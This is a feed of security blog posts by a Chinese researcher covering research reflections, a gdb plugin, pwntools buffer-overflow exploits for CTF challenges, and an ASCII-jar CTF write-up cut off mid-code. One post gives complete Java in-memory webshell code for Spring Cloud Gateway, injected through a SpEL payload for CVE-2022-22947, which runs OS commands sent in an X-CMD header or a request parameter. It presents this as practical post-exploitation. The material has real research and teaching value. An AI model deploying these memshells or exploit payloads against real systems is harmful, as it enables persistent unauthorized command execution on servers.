回忆飘如雪

寻找暗行为

Thu, 11 Dec 2025 18:31:08 +0800

回忆飘如雪中国香港

一个正常功能如何变成特性，特性如何形成trick，trick如何转变为缺陷，缺陷又如何升级为漏洞？

在这一列的转化当中，我觉察到一个核心变量：暗行为。

接下来我会花一些时间梳理下自己的察觉到的暗行为，感兴趣的朋友进圈围观交流。

跳转微信打开

关于杨振宁先生辞世与安全研究有感

Fri, 21 Nov 2025 11:30:00 +0800

原创 c0ny1 2025-11-21 11:30 中国香港

在一个伟大物理学家离去之际，重思安全研究

0x00 前言

人生到达这个阶段，已经经历过太多名人的离世，早已见怪不怪了。

不过杨先生的辞世还是让我略显震惊。我的记忆一下子就被拉回到了听卓克老师的《科学人物课：杨振宁》的时光。那时先生的故事带给我了极大情绪波动和思考深度。

因为杨振宁出生时，持续20多年的物理学黄金时代已达顶峰。他正式出道时，这股浪潮已退至白银时代，相对低矮的果实已经被摘完了。这时候要想取得成就，比黄金年代要困难得多。

在错过了最大风口之后，他仍然做出非凡成就。以中国人的身份首次登上世界科学顶峰，至今仍是我们中国人触及的最高高度。我想这背后一定有着值得“咀嚼”的东西。🤔

从2025年10月18日中午知道辞世的消息到最近的日子，我一直在断断续续重新翻看了杨先生的各类公开讲话，采访，文章等，以便重新梳理出自己的一些感悟。下面挑2个对目前的我影响比较大的点来说说。

0x01 taste

在每一个有创造性活动的领域里，一个人的taste，加上他的能力、脾气和机遇，决定了他的风格，而这种风格反过来又决定他的贡献。

—— 杨振宁《论文（1945—1980）选及评注》

杨先生在多次公开的讲话和自己文章当中，谈到了taste的重要性。曾有人将taste译为品味，爱憎。杨先生都不太赞同，但由于暂时没有更理想的翻译现在基本都暂时翻译为了“品味”。但越是无法言说的东西越是精妙之所在，这促使我对taste有了巨大的兴趣。

1.1 taste是什么？

taste 虽然很难给一个一句话定义，但它会在行为中显现出来。我们先看杨先生的三件往事。

事件一：批评超弦理论和粒子寻找实验
他认为前者只依赖于数学体系，严重缺少实验证据。而后者是完全抛弃数学框架，一味做大量实验。这两类研究在他看来都“不美”。

事件二：坚持选择“数学 × 物理”深度结合的问题
他长期围绕对称性、规范性等深层结构做研究，不追热点，不做碎片化问题。

事件三：反对中国建造超大对撞机
他说：“The party is over”（盛宴已过）
高能物理研究的辉煌时代已经过去，没有更多深层次的问题需要这种对撞机来解决，且建设成本过高，成功的概率较小。

到这里我们基本可以描绘出taste的轮廓了。

如果仅审美来描述taste的话，只是体现了个人偏好的部分。
而杨先生口中的 taste，指向一种更普适、更底层的能力：

在极度复杂的信息中，精准判断什么是“真正重要、值得投入、能引领未来”的能力。

换句话说，它是：

• 对本质的敏感度
• 发现“深结构”的能力
• 判断“方向对不对”的大局观
• 经长期训练而形成的稳定直觉

1.2 taste有什么用？

在芝加哥大学求学时期导师泰勒给的研究题目并不是适合他的口味，最终他决定自己博士论文方向，当时选了如下4个题目：

1. 伊辛模型
2. Bethe假设
3. 规范场
4. 核反应角分布

最终第4个题目成了他的毕业论文，而前面3个议题，虽然每个议题他都研究了1-2个月，都没有研究明白。但这些选题基本贯穿了杨先生整个研究生涯，其中规范场更是发展成了他最重要的贡献“杨-米尔斯”方程。

不得不好奇，在杨先生当时是基于什么会选出了这4个课题？而最终这4个课题竟然都做出了重要成果。我想答案是：它们都是taste打捞上来的。

taste让他识别哪些问题值得长期关注，哪些研究方向美的或有价值的。品味和美感引导他选择研究问题，让他能在几十年的研究生涯当中始终保持着激情，不断积累成果。

值得一说的是，乔布斯曾在采访《Steve Jobs: The Lost Interview》里提起过类似的观点。

在杨先生的《曙光集》里有一则关于爱因斯坦的轶事，爱因斯坦在晚年时曾经讨论过为什么他选择物理，他说：

在数学领域里，我的直觉不够，不能辨认哪些是真正重要的研究，哪些只是不重要的题目。而在物理领域里，我很快学到怎样找到基本问题来下功夫。

最后回到我们关注的安全研究领域，我时常觉得orange历年的议题选题体现了自己的taste。而我今年看他在给phrak写的最新文章《The Art of PHP — My CTF Journey and Untold Stories!》^[1]时，在结语部分我看到了那个熟悉的描述。

1.3 如何培养自己的taste？

杨先生曾用一个数学式子(D+E+F)/3来描述自己的风格，其中D代表狄拉克（数学美感），E代表爱因斯坦（物理直觉），F代表费米（实验务实精神），这三位物理学大师都是他心中的偶像。

那么具体如何培养呢？

朱邦芬院士在《有利学者培养科研品味的环境尚待形成》^[2])一文当中曾请教过杨先生过这个问题。

这些从他后来在台湾大学做的科普讲座《美与物理》^[3]里，可以看到他对于每个做出伟大贡献的物理学家，都做了深度拆解。

0x02 小问题 VS 大问题

大题目、小题目都可以想，可以做，不过多半的时候应该做小题目。如果一个人专门做大题目的话，成功的可能性可能很小，而得精神病的可能很大。

—— 杨振宁《我的治学经历与体会》

我想做过安全研究和想做安全研究的师傅，也许都有过一种渴望或者遗憾。

我的职业生涯什么时候才能有一个影响深远的漏洞成果呢？

我也不例外，这也导致了在一段时间内一直很热衷于“大问题”。但是我一直没有结果。最后兴趣锐减，也就不了了之了。经过几轮相同的经历后，我陷入了深深迷茫关于小问题还是大问题的选择中。

朋友曾拿着Orange那张著名的漏洞挖掘过程曲线图安慰过我。

我自然是明白挖掘过程的跌宕起伏是再正常不过的事情，可在这个问题上我依然有些犹豫和迷茫。

专注大问题的长期价值，还是小问题的及时反馈？
如何平衡它们？

直到有一天我在Firebasky师傅的github首页上看到了一个截图。它是为5G通信做出极大贡献的极化码之父Arikan教授给一个B站博主的的回信，至此我的内心似乎开始有了一个不错的答案。

0x03 最后的话

作为普通人，白天我们难免被困在为了赚钱养家糊口，实现世俗成功的宏大叙事里。

而当夜深人静，在探索自己心中所热爱的事物时，也许我们可以从那些伟大心灵的思考与实践中获得一些启发与慰藉。

有幸在杨老吊唁活动的最后一天，亲手献上一束花，以表敬意。

引用链接

[1] 《The Art of PHP — My CTF Journey and Untold Stories!》: https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/
[2] 《有利学者培养科研品味的环境尚待形成》: https://espre.bnu.edu.cn/sysxw/kyjyjl/7cb9ad651c7a4ae38794122829ef95f1.html
[3] 《美与物理》: https://www.youtube.com/watch?v=IVxAUlaasd4

阅读原文

跳转微信打开

做安全研究没有灵感怎么办？

Sat, 08 Nov 2025 14:59:00 +0800

原创 c0ny1 2025-11-08 14:59 中国香港

获取灵感的小tips

1. 把自己放在问题里

我能清晰的感受到，之前在乙方公司做一线工作的时候，每天都有东西可以去探索有想法要去实现。而后面选择gap的几年时间里，我几乎没有输出过什么文章。

后来我意识到了一线的工作环境每天会抛给你无数的问题。它倒逼我去主动思考解决问题，在解决问题的过程当中我发现了很多有意思的东西。

可是我们无法决定自己的环境，那能否主动创造这样的氛围呢？

如下是我自己在实践的tips

• a. 关注社群/知识星球/朋友的提出的一些疑问，特别关注反复出现的
• b. CTF题目,可以当休闲时间的小玩具
• c. 在日常生活中细微的异常（经常报的错，莫名其妙的崩溃闪退，某些情况下网速异常...）

2. 定期回顾经典漏洞/议题

太阳底下无新事，圣经里的这句话放在漏洞挖掘领域尤为合适。

当我在觉得JumpServer伪随机重置密码漏洞（CVE-2023-42820）使用伪random+密码重置场景很有想象力时，其实早在15年前的CVE-2008-4102已有所体现。

当我在感叹，Zoho ManageEngine ADAudit Plus XXE to RCE（CVE-2022-28219）漏洞作者使用XXE的上传和列目录非常巧妙时，原来Timothy Morgan早在2013年的AppSec USA上提过。

3. 阅读经典设计文档和源码

比如RFC文档,JDK源码,中间件实现等等

Beched曾经好奇orange是怎么知道phar涉及php反序列化的，orange的回答是阅读php代码。

阅读原文

跳转微信打开

编写gdb插件快速计算地址信息

Fri, 05 Sep 2025 12:00:00 +0800

原创 c0ny1 2025-09-05 12:00 中国香港

debug过程中一键获取地址信息

0x00 背景

作为一张二进制白纸，有时候不得不查看一些地址的各类信息。比如：

该地址在哪一个段呢? .bss还是.data？
某个值是在堆还是栈？
这个地址对应IDA/ghidra的地址是多少？
该地址所属的映射文件是哪一个？
......

每次都要不断的执行命令,然后盯着屏幕的一长串地址列表看目标在那个范围。

网上找了一圈也没找到合适插件，还是自己浅浅搓一个吧。

0x01 梳理

要回答上面的问题，我们其实只需要获取到如下3类信息。

1. 基地 + 偏移
2. 段名
3. 所属映射文件

翻了一下文档Python API (Debugging with GDB)^[1]发现除了没有合适的api直接获取，看样子只能通过内置的命令获取（有点不优雅）。

info filesinfo proc mappings

0x02 实现

获取info proc mappings命令结果后，遍历出目标地址所在地址范围。objfile列就是目标地址所属映射文件，而基地址+偏移可以按照如下公式计算。

基址 = Start Addr偏移 = 目标地址 - 基址

段的信息，可以从info files信息进行提取。根据地址所在的范围，提取对应的段名。

完整代码如下

import reimport gdbclassAddrInfo(gdb.Command):    PLUGIN_NAME = "AddrInfo"    VERSION = "1.0"    def__init__(self):        super(AddrInfo, self).__init__("addrinfo", gdb.COMMAND_USER)    definvoke(self, arg, from_tty):        arg = arg.strip()        ifnot arg:            print("Usage: addrinfo ")            print("Example: addrinfo 0x7ffff7dd18c0")            return        try:            address = int(gdb.parse_and_eval(arg))        except Exception:            print(f"Error: Invalid address format: '{arg}'")            print("Usage: addrinfo ")            print("Make sure the address is valid in the current debug context.")            return        try:            base_addr, start, end, offset, perms, objfile = self.find_mapping(address)            seg_name, seg_start, seg_end = self.find_section(address)            if base_addr isnotNone:                print(f'''{self.PLUGIN_NAME} {self.VERSION}Address:  {hex(address)} [{hex(start)} - {hex(end)}] Base:     {hex(base_addr)}Offset:   {hex(offset)}Section:  {seg_name} [{hex(seg_start)} - {hex(seg_end)}]Perms:    {perms}ObjFile:  {objfile}''')            else:                print(f"Address {hex(address)} does not belong to any known mapped region.")        except Exception as e:            print(f"Error during processing: {e}")        # 遍历段名    deffind_section(self, addr):        output = gdb.execute("info files", to_string=True)        pattern = re.compile(r"0x([0-9a-f]+)\s*-\s*0x([0-9a-f]+)\s+is\s+(\S+)")        matches = pattern.findall(output)        # 正则匹配，第3列是段名        for start, end, name in matches:            start = int(start, 16)            end = int(end, 16)            if start <= addr < end:                return name, start, end        returnNone, None, None    deffind_mapping(self, addr):        mappings = gdb.execute("info proc mappings", to_string=True).splitlines()        for line in mappings:            parts = line.strip().split()            iflen(parts) < 2:                continue            try:                start = int(parts[0], 16)                end = int(parts[1], 16)            except ValueError:                continue            if start <= addr < end:                base_addr = start                offset = addr - start                perms = parts[4] iflen(parts) > 4else"?"                objfile = parts[5] iflen(parts) > 5else"?"                return base_addr, start, end, offset, perms, objfile        returnNone, None, None, None, None, NoneAddrInfo()

若后续有新的功能或者为了适配更多的gdb版本，会在下面地址更新。主要还是看有没有实用价值吧，毕竟目前只是用来玩玩具。

https://github.com/c0ny1/gdb-addrinfo

0x03 使用

临时安装

(gdb) source AddrInfo.py

永久安装，在文件~/.gdbinit的末尾添加如下命令。

source /yourpath/AddrInfo.py

然后就可以愉快玩耍了

引用链接

[1] Python API (Debugging with GDB): https://sourceware.org/gdb/current/onlinedocs/gdb.html/Python-API.html

阅读原文

跳转微信打开

从零开始学PWN学03：jarvisoj_level2

Wed, 27 Aug 2025 11:30:00 +0800

原创 c0ny1 2025-08-27 11:30 中国香港

跳转地址的选择与参数传递的思考

题目本身有点boring，但是细节还挺耐玩。在解题过程各种玩，各种钻牛角尖中略有收获。

0x01 分析

很明显，溢出点在read的buf参数。buf参数距离函数返回地址有136+4=140个字节，所以读入的256个字节完全可以覆盖得到。

接下来我们需要考虑往哪个地址跳了，发现并没有经典的后门函数，但是有system函数。

那么我们是否可以在栈上压入一个字符串/bin/sh来作为system函数的参数呢？

答案是不可以。因为system函数的参数是char *，所以我们需要去找一下程序当中原本就存在的/bin/sh,然后将它的地址放在栈上作为参数。

int system(const char *command){  return system(command);}

搜到两处，我们只能用在level2里的。因为libc.so.6开启了地址随机化，每次运行地址有变化。

覆盖函数返回值，我们该用call system还是system定义处地址呢？答案是：其实都可以。

因此根据这两处，就有2个构造payload方案了。它们的区别主要在于需要构造的栈内存结构不太一样。

0x2 利用

2.1 方式一：跳到call system处

call func方式栈内存布局

Param nParam n-1...Param 1

payload = 'A' * offset + system调用处地址 + 参数1

from pwn import *call_system_addr = 0x0804849e#call_system_addr = 0x804845coffset = 140str_bin_sh_addr = 0x0804a024payload = offset * b'A' + p32(call_system_addr) + p32(str_bin_sh_addr)p = remote('node5.buuoj.cn',27491)pause()p.sendline(payload)p.interactive()

2.2 方式二：跳到system定义处

在程序里我们会看到有两个 system：一个出现在 .plt 段，另一个在 extern 段。我们该用哪个呢？

答：真正能用的只有 .plt 里的 system。

原因是：.plt 段里的 system 是程序调用外部函数时的跳板入口，执行时会正确跳转到 glibc 里的实现。而 extern 段只是 IDA 自己生成的“占位符”（虚拟出来的段），用来表示“这里依赖了外部的 system 函数，但没在本地定义”。它对应的地址（例如 0x0804A038）并不是真实可执行的地址。

func define方式栈内存布局

Param nParam n-1...Param 1ret addrold_rbp...

payload = 'A' * offset + system定义处地址 + 函数返回地址 + 参数1

因为执行完system('/bin/sh')后，我们的目的已经达成，至于后续跳转到什么地方无所谓。所以函数返回地址可以任意，这里设置为0。

from pwn import* p = remote('node4.buuoj.cn',28084)#p=process('./level2') str_bin_sh_addr = 0x0804a024system_define_addr = 0x08048320 p.recvuntil('Input:\n')payload = b'A' * (0x88 + 0x04) + p32(system_define_addr) + p32(0) + p32(str_bin_sh_addr) p.sendline(payload)p.interactive()

阅读原文

跳转微信打开

从零开始学PWN学02：标准输出与回显

Tue, 03 Jun 2025 09:00:00 +0800

原创 c0ny1 2025-06-03 09:00 中国香港

重新理解标准输出和回显

0x01 warmup_csaw_2016

通过

gets

函数的栈溢出覆盖

main

函数的返回地址，使程序流程跳转至

sub_40060D

函数内的地址

0x40060E

。

之所以跳转至

0x40060E

而不是函数入口，是因为

system

函数在调用前会检查栈顶地址是否 16 字节对齐（这一点在上一篇文章中已有说明）。

from pwn import *system_cat_flag_addr = 0x40060eoffset = 0x40 + 8payload = offset * b'A' + p64(system_cat_flag_addr)p = remote('node5.buuoj.cn',27841)p.sendline(payload)p.interactive()

起初我想复杂了，知道溢出后能执行

system("cat flag.txt")

，但卡在“结果怎么回显”这个问题上。

那不得

ROP

，先执行到

system

然后

printf

？

事后看来受Java编程思维惯性影响，以为必须通过显示的

System.out.print

才能输出

Runtime.getRuntime().exec

执行命令结果。

但是C语言中的

system

函数在执行完命令后，命令进程会继承父进程的标准输出，同时会自动把执行结果往

fd 1

（标准输出）当中

write

。所以不需要显式调用

printf

。

为验证上述结论，我编写了一个简单的 demo，并使用

strace

观察其系统调用

#include int main() {    system("cat /flag");    return 0;}

日志确实印证了

system

函数会自动将命令输出写入标准输出。

后面复盘了下，为何java没有执行命令后就直接回显结果？

实际上是因为 Java 默认不会让子进程继承父进程的标准输出。若希望像 C 程序那样执行命令后直接将结果输出到终端，需要显式设置子进程继承标准输出。

ProcessBuilder pb = new ProcessBuilder("cat", "/tmp/flag.txt");  pb.redirectOutput(ProcessBuilder.Redirect.INHERIT); // 允许继承父进程标准输出  pb.start();

0x02 ciscn_2019_n_11

在程序的正常逻辑下，无论输入什么，变量

的值始终为

0.0

，因此无法达到我们希望触发的

system("cat /flag")

分支。

常规思路是我们通过

gets

溢出

0x30+8

个垃圾字符覆盖掉

func

的

ret

地址，并跳到

0x4006BE

就可以了。不过这个没有啥意思，都是之前的套路。

还有一个思路就是

也在栈上，我们可以覆盖它的值为

11.28125

就行了。

先在gdb验证下，把

修改后，确实可以走到目标逻辑。

b getsfinishset *(float *)($rsp - 0x4) = 11.28125

计算下

到

的偏移为 offset = (rbp-0x4) - (rbp-0x30) = 44。同时注意写exploit时，要把

11.28125

转为

float

类型对应的二进制表示，以便正确覆盖栈上的

。

from pwn import *import structv2_value = 11.28125offset = 44payload = offset * b'A' + struct.pack(',v2_value)#p = process("./ciscn_2019_n_11")p = remote('node5.buuoj.cn',27324)p.sendline(payload)p.interactive()

阅读原文

跳转微信打开

Spring cloud gateway通过SPEL注入内存马

Wed, 09 Mar 2022 12:00:00 +0800

原创 c0ny1 2022-03-09 12:00

spring cloud gateway内存马的构造思路

0x00

背景

最进小火的漏洞CVE-2022-22947虽然原理简单，但是实战利用还是有点小麻烦。目前公开的利用是每执行一条命令就得注册一条路由，refresh一下网关，最后在访问这个路由。先不说步骤较多，就是频繁刷新会影响业务。实战当中注入一个内存马才是硬道理！

spring cloud gateway的web服务是netty+spring构建的，netty的web服务没有遵循servlet规范来设计。这也导致了构造它的内存马，与常规中间件有所不同，从某种程度来讲是这是一种新类型的内存马。

下面以vulhub中的spring cloud gateway 3.1.0作为环境，来分享下构造netty层和spring层的内存马，其他版本思路相同。

0x01

高可用Payload

Spring cloud gateway对payload的稳定性要求比较高，一旦报错是由可能会影响业务的。所以在开始之前，我们需要先构造一个"优质"的SPEL执行java字节码的payload。

我主要对payload进行了如下的优化：

1. 解决BCEL/js引擎兼容性问题

2. 解决base64在不同版本jdk的兼容问题

3. 可多次运行同类名字节码

4. 解决可能导致的ClassNotFound问题

#{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}

0x02

netty层内存马

netty处理http请求是构建一条责任链pipline,http请求会被链上的handler会依次来处理。所以我们的内存马其实就是一个handler。

不像常规的中间件，filter/servlet/listener组件有一个统一的维护对象。netty每一个请求过来，都是动态构造pipeline，pipeline上的handler都是在这个时候new的。负责给pipeline添加handler是ChannelPipelineConfigurer(下面简称为configurer)，因此注入netty内存马的关键是分析configurer如何被netty管理和工作的。

CompositeChannelPipelineConfigurer#compositeChannelPipelineConfigurer是为pipeline选择configurer的关键逻辑。第一个参数是Spring cloud gateway默认的configurer，第二个是用户额外配置的。一般情况下第一个参数是不为空配置，第二个参数为空配置，所以返回的configurer是Spring cloud gateway默认的。

如果我们能够设置第二个other参数不为空配置呢？那么这两个configurer将被合并为一个新CompositeChannelPipelineConfigurer。

// reactor.netty.ReactorNetty.CompositeChannelPipelineConfigurer#compositeChannelPipelineConfigurer
static ChannelPipelineConfigurer compositeChannelPipelineConfigurer(ChannelPipelineConfigurer configurer, ChannelPipelineConfigurer other) {
    if (configurer == ChannelPipelineConfigurer.emptyConfigurer()) { // 默认configurer是无操作空配置
        return other;
    } else if (other == ChannelPipelineConfigurer.emptyConfigurer()) { // 其他额外configurer是无操作空配置
        return configurer;
    } else {
        ......
        ChannelPipelineConfigurer[] newConfigurers = new ChannelPipelineConfigurer[length];
        int pos;
        if (thizConfigurers != null) {
            pos = thizConfigurers.length;
            System.arraycopy(thizConfigurers, 0, newConfigurers, 0, pos);
        } else {
            pos = 1;
            newConfigurers[0] = configurer;  // 将默认configurer存储到新configurer
        }
        if (otherConfigurers != null) {
            System.arraycopy(otherConfigurers, 0, newConfigurers, pos, otherConfigurers.length);
        } else {
            newConfigurers[pos] = other; // 将其他额外configurer存储到新configurer
        }
        // 合并成新的configurer
        return new ReactorNetty.CompositeChannelPipelineConfigurer(newConfigurers);
    }
}

CompositeChannelPipelineConfigurer会循环调用所有合并进来configurer来对pipeline添加handler。

// reactor.netty.ReactorNetty.CompositeChannelPipelineConfigurer
static final class CompositeChannelPipelineConfigurer implements ChannelPipelineConfigurer {
    final ChannelPipelineConfigurer[] configurers;
    CompositeChannelPipelineConfigurer(ChannelPipelineConfigurer[] configurers) {
        this.configurers = configurers;
    }
    public void onChannelInit(ConnectionObserver connectionObserver, Channel channel, @Nullable SocketAddress remoteAddress) {
        ChannelPipelineConfigurer[] var4 = this.configurers;
        int var5 = var4.length;
        // 循环调用所有configurer对pipeline设置handler
        for(int var6 = 0; var6 < var5; ++var6) {
            ChannelPipelineConfigurer configurer = var4[var6];
            configurer.onChannelInit(connectionObserver, channel, remoteAddress);
        }
    }
}

因此我们可以通过修改other参数为自己的configurer向pipline中添加内存马。翻阅源码发现reactor.netty.transport.TransportConfig类的doOnChannelInit属性存储着other参数，我使用java-object-searcher以doOnChannelInit为关键字，定位出了它在线程对象的位置。

TargetObject = {[Ljava.lang.Thread;} 
   ---> [3] = {org.springframework.boot.web.embedded.netty.NettyWebServer$1} = {org.springframework.boot.web.embedded.netty.NettyWebServer$1} 
    ---> val$disposableServer = {reactor.netty.transport.ServerTransport$InetDisposableBind} 
     ---> config = {reactor.netty.http.server.HttpServerConfig} 
        ---> doOnChannelInit = {reactor.netty.ReactorNetty$$Lambda$391/236567414}

最终内存马构造如下：

public class NettyMemshell extends ChannelDuplexHandler implements ChannelPipelineConfigurer {
    public static String doInject(){
        String msg = "inject-start";
        try {
            Method getThreads = Thread.class.getDeclaredMethod("getThreads");
            getThreads.setAccessible(true);
            Object threads = getThreads.invoke(null);
            for (int i = 0; i < Array.getLength(threads); i++) {
                Object thread = Array.get(threads, i);
                if (thread != null && thread.getClass().getName().contains("NettyWebServer")) {
                    Field _val$disposableServer = thread.getClass().getDeclaredField("val$disposableServer");
                    _val$disposableServer.setAccessible(true);
                    Object val$disposableServer = _val$disposableServer.get(thread);
                    Field _config = val$disposableServer.getClass().getSuperclass().getDeclaredField("config");
                    _config.setAccessible(true);
                    Object config = _config.get(val$disposableServer);
                    Field _doOnChannelInit = config.getClass().getSuperclass().getSuperclass().getDeclaredField("doOnChannelInit");
                    _doOnChannelInit.setAccessible(true);
                    _doOnChannelInit.set(config, new NettyMemshell());
                    msg = "inject-success";
                }
            }
        }catch (Exception e){
            msg = "inject-error";
        }
        return msg;
    }
 
    @Override
    // Step1. 作为一个ChannelPipelineConfigurer给pipline注册Handler
    public void onChannelInit(ConnectionObserver connectionObserver, Channel channel, SocketAddress socketAddress) {
        ChannelPipeline pipeline = channel.pipeline();
        // 将内存马的handler添加到spring层handler的前面        
        pipeline.addBefore("reactor.left.httpTrafficHandler","memshell_handler",new NettyMemshell());
    }
    
    
    @Override
    // Step2. 作为Handler处理请求，在此实现内存马的功能逻辑
    public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
        if(msg instanceof HttpRequest){
            HttpRequest httpRequest = (HttpRequest)msg;
            try {
                if(httpRequest.headers().contains("X-CMD")) {
                    String cmd = httpRequest.headers().get("X-CMD");
                    String execResult = new Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
                    // 返回执行结果
                    send(ctx, execResult, HttpResponseStatus.OK);
                    return;
                }
            }catch (Exception e){
                e.printStackTrace();
            }
        }
        ctx.fireChannelRead(msg);
    }
    private void send(ChannelHandlerContext ctx, String context, HttpResponseStatus status) {
        FullHttpResponse response = new DefaultFullHttpResponse(HttpVersion.HTTP_1_1, status, Unpooled.copiedBuffer(context, CharsetUtil.UTF_8));
        response.headers().set(HttpHeaderNames.CONTENT_TYPE, "text/plain; charset=UTF-8");
        ctx.writeAndFlush(response).addListener(ChannelFutureListener.CLOSE);
    }
}

0x03

Spring层内存马

Spring层request请求处理组件很多，有handler/Adapter/Filter等等，理论上都可以拿来做内存马，这里我分享下最简单的RequestMappingHandler。

Spring cloud gateway主要的路由分发主要由org.springframework.web.reactive.DispatcherHandler类和它三个组件来完成

1. org.springframework.web.reactive.HandlerMapping 路由比配器

2. org.springframework.web.reactive.HandlerAdapter handler适配器

3. org.springframework.web.reactive.HandlerResultHandler 结果处理器

具体逻辑如下：

// org.springframework.web.reactive.DispatcherHandler#handle
public Mono handle(ServerWebExchange exchange) {
    return this.handlerMappings == null ? this.createNotFoundError() : Flux.fromIterable(this.handlerMappings).concatMap((mapping) -> {
        return mapping.getHandler(exchange); // Step1. 使用HandlerMapping匹配路由
    }).next().switchIfEmpty(this.createNotFoundError()).flatMap((handler) -> {
        return this.invokeHandler(exchange, handler); // Step2. 使用具体HandlerAdapter来处理具体请求
    }).flatMap((result) -> {
        return this.handleResult(exchange, result); // Step3. 使用适合的HandlerResultHandler来处理返回的结果
    });
}

基于这个流程，我们可以梳理出一个构造内存马的思路。让HandlerMapping注册一个映射关系，通过映射关系让特定的HandlerAdapter执行到我们的内存马流程，最后内存马返回一个HandlerResultHandler可以处理的结果类型即可。

这里我选择RequestMappingHandlerMapping这个HandlerMapping，来注册一个与使用@RequestMapping("/*")等效的内存马。

public class SpringRequestMappingMemshell {
    public static String doInject(Object requestMappingHandlerMapping) {
        String msg = "inject-start";
        try {
            Method registerHandlerMethod = requestMappingHandlerMapping.getClass().getDeclaredMethod("registerHandlerMethod", Object.class, Method.class, RequestMappingInfo.class);
            registerHandlerMethod.setAccessible(true);
            Method executeCommand = SpringRequestMappingMemshell.class.getDeclaredMethod("executeCommand", String.class);
            PathPattern pathPattern = new PathPatternParser().parse("/*");
            PatternsRequestCondition patternsRequestCondition = new PatternsRequestCondition(pathPattern);
            RequestMappingInfo requestMappingInfo = new RequestMappingInfo("", patternsRequestCondition, null, null, null, null, null, null);
            registerHandlerMethod.invoke(requestMappingHandlerMapping, new SpringRequestMappingMemshell(), executeCommand, requestMappingInfo);
            msg = "inject-success";
        }catch (Exception e){
            msg = "inject-error";
        }
        return msg;
    }
    public ResponseEntity executeCommand(String cmd) throws IOException {
        String execResult = new Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
        return new ResponseEntity(execResult, HttpStatus.OK);
    }
}

那怎么获取到RequestMappingHandlerMapping呢？通过java-object-searcher自然可以定位到，小组的@whw1sfb师傅提到了一种更简便的方案，从SPEL上下文的bean当中获取！

0x04

总结

从最后的效果来看，spring层的内存马更好做兼容性，因为可以直接从bean当中获取目标对象，唯一要考虑的就是注册方法在各个版本是否兼容。

关于各个协议和组件的内存马的构造思路其实都大同小异，说白了就是分析涉及处理请求的对象，阅读它的源码看看是否能获取请求内容，同时能否控制响应内容。然后分析该对象是如何被注册到内存当中的，最后我们只要模拟下这个过程即可。

0x05

参考资料

https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/

0x06

招聘：红队武器化工程师

最后给团队(奇安信观星实验室)招个队友,有意向的可以公众号后台或者邮箱root#gv7.me联系我，期待与你共事。

6.1 工作内容

学习最前沿的攻防技术，挖掘0day，并将研究成果自动化武器化。

6.2 能力要求

可以分析调试最新报送的漏洞
可以将研究成果自动化武器化

6.3 加分项

有高质量文章blog
有不错的自动化开源作品
有原创CVE

阅读原文

跳转微信打开

RWCTF 4th Desperate Cat ASCII Jar Writeup

Mon, 14 Feb 2022 12:00:00 +0800

原创 c0ny1 2022-02-14 12:00

ascii jar构造之旅

0x00

背景

出题人的Writeup当中提到了一个非预期解，上传一个ASCII jar并执行它来解题。思路都好理解，但如何构造这个特殊的jar，一笔带过了。文章里介绍的工具也是不能直接使用的。这篇文章主要是分享ASCII jar的构造思路。

在开始之前，我们先思考一个问题，为何需要控制字节在ASCII(0-127)之内呢？

这是因为题目写的文件内容是一个String而不是一个byte[]，String的编码决定着它的byte[]。各类编码是可以兼容ASCII的，无论怎么编码转换，ASCII范围的字符二进制都可以做到不变。所以该题最终需要控制jar的内容在0-127同时不包含被转义的&<'>"()字符。

0x01

构造思路

jar格式包含着各类信息，我们需要让每一部分都在允许的字节范围内。但每部分生成的算法并不相同，所以需要分别构造，最终合并成一个合法的jar。

一个简单的jar格式大概如下

def wrap_jar(raw_data,compressed_data,zip_entry_filename):
    crc = zlib.crc32(raw_data) % pow(2, 32)
    return (
        b'PK\3\4' +    # Magic
        binascii.unhexlify(
            '0a000000' +     # Version needed to extract
            '080000000000'   # Compression Method
        ) +
        struct.pack(', crc) +
        struct.pack(', len(compressed_data) % pow(2, 32)) +
        struct.pack(', len(raw_data) % pow(2, 32)) +
        struct.pack(', len(zip_entry_filename)) +
        b'\0\0' +
        zip_entry_filename +
        compressed_data +
        b'PK\1\2\0\0' +  # Magic
        binascii.unhexlify(
            '0a000000' +     # Version needed to extract
            '080000000000'
        ) +
        struct.pack(', crc) +
        struct.pack(', len(compressed_data) % pow(2, 32)) +
        struct.pack(', len(raw_data) % pow(2, 32)) +
        struct.pack(', len(zip_entry_filename)) +
        b'\0' * 10 +
        struct.pack(', 0) + # offset of file in archive
        zip_entry_filename +
        b'PK\5\6\0\0\0\0\0\0' + # Magic
        struct.pack(', 1) +  # number of files
        struct.pack(', len(zip_entry_filename) + 0x2e) + # size of CD
        struct.pack(', len(compressed_data) + len(zip_entry_filename) + 0x1e) + # offset of CD
        b'\0\0'
    )

要想让所有部分都在限定的ASCII范围，其实是需要如下7个部分要满足要求。

1. compressed_data
2. struct.pack(', crc)
3. struct.pack(', len(raw_data) % pow(2, 32))
4. struct.pack(', len(compressed_data) % pow(2, 32))
5. struct.pack(', len(zip_entry_filename))
6. struct.pack(', len(zip_entry_filename) + 0x2e)
7. struct.pack(', len(compressed_data) + len(filename) + 0x1e)

这里zip_entry_filename为Exploit.class的话，5和6是满足要求的。1条件中的compressed_data是deflate算法压缩后的数据，这部分是可以调用ascii-zip项目中的实现来构造的。所以还剩下4部分需要限定下。

1. struct.pack(', crc)
2. struct.pack(', len(raw_data) % pow(2, 32))
3. struct.pack(', len(compressed_data) % pow(2, 32))
4. struct.pack(', len(compressed_data) + len(zip_entry_filename) + 0x1e)

一个文件的crc，raw_data和compressed_data之间都是互相有影响的。当然可以尝试寻找一个数学公式能表达它们的关系，最终计算出符合条件的jar格式。这个显然是优雅的，但是实现成本比较高。我最终采用的是往class不断填充垃圾数据，直到4个部分都符合要求。

0x02

编写爆破脚本

假设我们构造的jar是往web目录下写一个jsp，代码可以如下，其中paddingData字段是填充垃圾数据的地方。

import org.apache.jasper.compiler.StringInterpreter;
import org.apache.jasper.compiler.StringInterpreterFactory;
import java.io.FileOutputStream;
public class Exploit implements StringInterpreter {
    private static final String paddingData = "{PADDING_DATA}";
    // 要执行的代码
    public Exploit() throws Exception {
        String shell = "<%out.println(\\"Exploit by c0ny1@sglab\\");%>";
